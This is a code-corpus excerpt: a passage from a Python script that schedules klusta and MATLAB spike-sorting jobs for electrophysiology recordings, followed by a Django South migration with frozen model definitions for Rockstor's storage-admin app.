def extractLFP(dirName,file,xmlfile,repoPath):
lfpFile = file.split('.')[0] + '.lfp'
# if not os.path.isfile(lfpFile): # check if LFP file exists...
# print('making LFP file for ' + os.getcwd())
# tree = ET.parse(dirName + '/' + xmlfile[0])
# root = tree.getroot()
# try:
# nChannels = int(root.find('acquisitionSystem').find('nChannels').text) # some very bad assumptions that your xml is formatted a la FMAToolbox....
# except (AttributeError):
# print('is your xml file formatted correctly? couldnt find nChannels....')
# resample.main(dirName,file,lfpFile,nChannels,20000,1250)
def startClusterJob(root, file): # starts the spike extraction/clustering process using
# if not socket.gethostname() == 'hyperion':
toRun = ['nohup klusta ' + file + ' &'] # create the klusta command to run
# run klusta job
subprocess.call(toRun[0], shell=True)
# add something here to write the computer name to the log file
f = open('complog.log', 'w')
f.write(socket.gethostname())
f.close()
print(['starting... ' + root + toRun[0]])
time.sleep(10) # let one process start before generating another
def startAutoClustering(shank, dirName,repoPath,status):
if any(fnmatch.fnmatch(status, p) for p in ['1000','abandoning', 'finishing']) and not os.path.exists("autoclustering.out"):
# check Klustakwik has finished
print(os.getcwd())
print('starting autoclustering on ' + shank + ' ..')
with open("autoclustering.out", "wb") as myfile:
myfile.write("autoclustering in progress\n")
runAutoClust = ['matlab -nodesktop -r "addpath(genpath(\'' + repoPath + '\'));'
' AutoClustering(\'' + dirName.split('/')[-1] + '\', ' + shank + ');exit"']
# making this a check_call forces matlab to complete before going to
# the next job (only one autoclustering job runs at a time)
subprocess.check_call(runAutoClust, shell=True)
def copyToSSD(ssdCompName, ssdDirectory, root, shank, status): # copies finished shanks to a SSD for manual spike sorting
if fnmatch.fnmatch(status, 'autoclustered') and socket.gethostname() == 'hyperion' and os.path.exists("autoclustering.out"):
# # checks that Autoclustering is done
print('copying ' + root + '/' + shank +
' to SSD and removing progress logfile..')
os.remove("autoclustering.out")
try:
shutil.copytree(root + '/' + shank, ssdDirectory +
root.split('/')[-2] + '/' + root.split('/')[-1] + '/' + shank)
except:
print('file exists already... not copying anything.')
# copy files to SSD
with open("nohup.out", "a") as myfile:
myfile.write("copied to SSD\n")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='This function is designed to run '\
'in the background on a data processing '\
'machine. It constantly searches through '\
'a given directory [arg1] and starts extract,'\
' clustering, and other processing jobs')
parser.add_argument('dataFolder',type=str,default=os.getcwd(),help='the folder with all of your recordings in subdirectories')
parser.add_argument('numShanks',type=float,default=10,help='number of shanks to process')
parser.add_argument('-waitTime',type=int,default=300,help='time (seconds) to wait before searching for more jobs [default = 300]')
parser.add_argument('-numJobs',type=float,default=4,help='number of jobs to run simultaneously [default = 4]')
parser.add_argument('-cpuLimit',type=float,default=100,help='cpu usage limit [default = 80]')
parser.add_argument('-repoPath',type=str,default=os.getcwd(),help='location of ephys-processing repository')
args = parser.parse_args()
main(args)
| DavidTingley/ephys-processing-pipeline | processRecordings.py | Python | gpl-3.0 | 11,099 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Removing unique constraint on 'NetworkInterface', fields ['name']
db.delete_unique(u'storageadmin_networkinterface', ['name'])
# Changing field 'NetworkInterface.autoconnect'
db.alter_column(u'storageadmin_networkinterface', 'autoconnect', self.gf('django.db.models.fields.CharField')(max_length=8, null=True))
# Changing field 'NetworkInterface.name'
db.alter_column(u'storageadmin_networkinterface', 'name', self.gf('django.db.models.fields.CharField')(max_length=100, null=True))
# Changing field 'NetworkInterface.method'
db.alter_column(u'storageadmin_networkinterface', 'method', self.gf('django.db.models.fields.CharField')(max_length=64, null=True))
def backwards(self, orm):
# Changing field 'NetworkInterface.autoconnect'
db.alter_column(u'storageadmin_networkinterface', 'autoconnect', self.gf('django.db.models.fields.CharField')(max_length=8))
# Changing field 'NetworkInterface.name'
db.alter_column(u'storageadmin_networkinterface', 'name', self.gf('django.db.models.fields.CharField')(default='yes', max_length=100, unique=True))
# Adding unique constraint on 'NetworkInterface', fields ['name']
db.create_unique(u'storageadmin_networkinterface', ['name'])
# Changing field 'NetworkInterface.method'
db.alter_column(u'storageadmin_networkinterface', 'method', self.gf('django.db.models.fields.CharField')(max_length=64))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'oauth2_provider.application': {
'Meta': {'object_name': 'Application'},
'authorization_grant_type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'client_id': ('django.db.models.fields.CharField', [], {'default': "u'hi=@=iqhh!2krLl@rZ@dyzDSfWa?8wmA;_N1zTia'", 'unique': 'True', 'max_length': '100'}),
'client_secret': ('django.db.models.fields.CharField', [], {'default': "u's4i?Y35J2.4;jS@ubKN:KYN0?=hTb3Z95iOMKF=1a9tlQ0GyaFbgGW-X3;@F:zJCS-l8EXnPW:A9bPGEWXvKHBH3Mf8LBS@kHvppt2-c4_FAaNS;oDAXTNWUoBFWB?HH'", 'max_length': '255', 'blank': 'True'}),
'client_type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'redirect_uris': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'storageadmin.advancednfsexport': {
'Meta': {'object_name': 'AdvancedNFSExport'},
'export_str': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'storageadmin.apikeys': {
'Meta': {'object_name': 'APIKeys'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
'user': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '8'})
},
'storageadmin.appliance': {
'Meta': {'object_name': 'Appliance'},
'client_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'client_secret': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'current_appliance': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'hostname': ('django.db.models.fields.CharField', [], {'default': "'Rockstor'", 'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'mgmt_port': ('django.db.models.fields.IntegerField', [], {'default': '443'}),
'uuid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
'storageadmin.configbackup': {
'Meta': {'object_name': 'ConfigBackup'},
'config_backup': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True'}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'md5sum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'size': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'storageadmin.containeroption': {
'Meta': {'object_name': 'ContainerOption'},
'container': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.DContainer']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'val': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'})
},
'storageadmin.dashboardconfig': {
'Meta': {'object_name': 'DashboardConfig'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'unique': 'True'}),
'widgets': ('django.db.models.fields.CharField', [], {'max_length': '4096'})
},
'storageadmin.dcontainer': {
'Meta': {'object_name': 'DContainer'},
'dimage': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.DImage']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'launch_order': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '1024'}),
'rockon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.RockOn']"})
},
'storageadmin.dcontainerlink': {
'Meta': {'unique_together': "(('destination', 'name'),)", 'object_name': 'DContainerLink'},
'destination': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'destination_container'", 'to': "orm['storageadmin.DContainer']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'source': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['storageadmin.DContainer']", 'unique': 'True'})
},
'storageadmin.dcustomconfig': {
'Meta': {'unique_together': "(('rockon', 'key'),)", 'object_name': 'DCustomConfig'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'rockon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.RockOn']"}),
'val': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'})
},
'storageadmin.dimage': {
'Meta': {'object_name': 'DImage'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'repo': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'tag': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
'storageadmin.disk': {
'Meta': {'object_name': 'Disk'},
'btrfs_uuid': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'offline': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parted': ('django.db.models.fields.BooleanField', [], {}),
'pool': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Pool']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'serial': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'size': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'smart_available': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'smart_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'transport': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'vendor': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'})
},
'storageadmin.dport': {
'Meta': {'unique_together': "(('container', 'containerp'),)", 'object_name': 'DPort'},
'container': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.DContainer']"}),
'containerp': ('django.db.models.fields.IntegerField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'hostp': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'hostp_default': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'protocol': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'uiport': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'storageadmin.dvolume': {
'Meta': {'unique_together': "(('container', 'dest_dir'),)", 'object_name': 'DVolume'},
'container': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.DContainer']"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'dest_dir': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'min_size': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Share']", 'null': 'True'}),
'uservol': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'storageadmin.emailclient': {
'Meta': {'object_name': 'EmailClient'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '1024'}),
'receiver': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'sender': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'smtp_server': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
'storageadmin.group': {
'Meta': {'object_name': 'Group'},
'admin': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'gid': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'groupname': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'storageadmin.installedplugin': {
'Meta': {'object_name': 'InstalledPlugin'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'install_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'plugin_meta': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Plugin']"})
},
'storageadmin.iscsitarget': {
'Meta': {'object_name': 'IscsiTarget'},
'dev_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'dev_size': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Share']"}),
'tid': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'tname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'storageadmin.netatalkshare': {
'Meta': {'object_name': 'NetatalkShare'},
'description': ('django.db.models.fields.CharField', [], {'default': "'afp on rockstor'", 'max_length': '1024'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'share': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'netatalkshare'", 'unique': 'True', 'to': "orm['storageadmin.Share']"}),
'time_machine': ('django.db.models.fields.CharField', [], {'default': "'yes'", 'max_length': '3'})
},
'storageadmin.networkinterface': {
'Meta': {'object_name': 'NetworkInterface'},
'autoconnect': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True'}),
'ctype': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'dname': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'dns_servers': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'dspeed': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'dtype': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'gateway': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ipaddr': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'itype': ('django.db.models.fields.CharField', [], {'default': "'io'", 'max_length': '100'}),
'mac': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'method': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'netmask': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'})
},
'storageadmin.nfsexport': {
'Meta': {'object_name': 'NFSExport'},
'export_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.NFSExportGroup']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mount': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Share']"})
},
'storageadmin.nfsexportgroup': {
'Meta': {'object_name': 'NFSExportGroup'},
'admin_host': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'editable': ('django.db.models.fields.CharField', [], {'default': "'rw'", 'max_length': '2'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'host_str': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mount_security': ('django.db.models.fields.CharField', [], {'default': "'insecure'", 'max_length': '8'}),
'nohide': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'syncable': ('django.db.models.fields.CharField', [], {'default': "'async'", 'max_length': '5'})
},
'storageadmin.oauthapp': {
'Meta': {'object_name': 'OauthApp'},
'application': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['oauth2_provider.Application']", 'unique': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.User']"})
},
'storageadmin.plugin': {
'Meta': {'object_name': 'Plugin'},
'css_file_name': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'description': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4096'}),
'display_name': ('django.db.models.fields.CharField', [], {'default': "''", 'unique': 'True', 'max_length': '4096'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'js_file_name': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'})
},
'storageadmin.pool': {
'Meta': {'object_name': 'Pool'},
'compression': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mnt_options': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'raid': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'size': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'toc': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'})
},
'storageadmin.poolbalance': {
'Meta': {'object_name': 'PoolBalance'},
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'percent_done': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'pool': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Pool']"}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'started'", 'max_length': '10'}),
'tid': ('django.db.models.fields.CharField', [], {'max_length': '36', 'null': 'True'})
},
'storageadmin.poolscrub': {
'Meta': {'object_name': 'PoolScrub'},
'corrected_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'csum_discards': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'csum_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'data_extents_scrubbed': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kb_scrubbed': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'last_physical': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'malloc_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'no_csum': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'pid': ('django.db.models.fields.IntegerField', [], {}),
'pool': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Pool']"}),
'read_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'started'", 'max_length': '10'}),
'super_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tree_bytes_scrubbed': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'tree_extents_scrubbed': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'uncorrectable_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'unverified_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'verify_errors': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'storageadmin.posixacls': {
'Meta': {'object_name': 'PosixACLs'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'perms': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'smb_share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SambaShare']"})
},
'storageadmin.rockon': {
'Meta': {'object_name': 'RockOn'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'https': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'icon': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'more_info': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'ui': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'volume_add_support': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'website': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True'})
},
'storageadmin.sambacustomconfig': {
'Meta': {'object_name': 'SambaCustomConfig'},
'custom_config': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'smb_share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SambaShare']"})
},
'storageadmin.sambashare': {
'Meta': {'object_name': 'SambaShare'},
'browsable': ('django.db.models.fields.CharField', [], {'default': "'yes'", 'max_length': '3'}),
'comment': ('django.db.models.fields.CharField', [], {'default': "'foo bar'", 'max_length': '100'}),
'guest_ok': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'read_only': ('django.db.models.fields.CharField', [], {'default': "'no'", 'max_length': '3'}),
'shadow_copy': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'share': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'sambashare'", 'unique': 'True', 'to': "orm['storageadmin.Share']"}),
'snapshot_prefix': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'storageadmin.setup': {
'Meta': {'object_name': 'Setup'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'setup_disks': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'setup_network': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'setup_system': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'setup_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'storageadmin.sftp': {
'Meta': {'object_name': 'SFTP'},
'editable': ('django.db.models.fields.CharField', [], {'default': "'ro'", 'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'share': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['storageadmin.Share']", 'unique': 'True'})
},
'storageadmin.share': {
'Meta': {'object_name': 'Share'},
'compression_algo': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'eusage': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'group': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '4096'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '4096'}),
'owner': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '4096'}),
'perms': ('django.db.models.fields.CharField', [], {'default': "'755'", 'max_length': '9'}),
'pool': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.Pool']"}),
'pqgroup': ('django.db.models.fields.CharField', [], {'default': "'-1/-1'", 'max_length': '32'}),
'qgroup': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'replica': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'rusage': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'size': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'subvol_name': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'toc': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'})
},
'storageadmin.smartattribute': {
'Meta': {'object_name': 'SMARTAttribute'},
'aid': ('django.db.models.fields.IntegerField', [], {}),
'atype': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'failed': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'flag': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'normed_value': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'raw_value': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'threshold': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'updated': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'worst': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'storageadmin.smartcapability': {
'Meta': {'object_name': 'SMARTCapability'},
'capabilities': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'flag': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['storageadmin.SMARTInfo']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
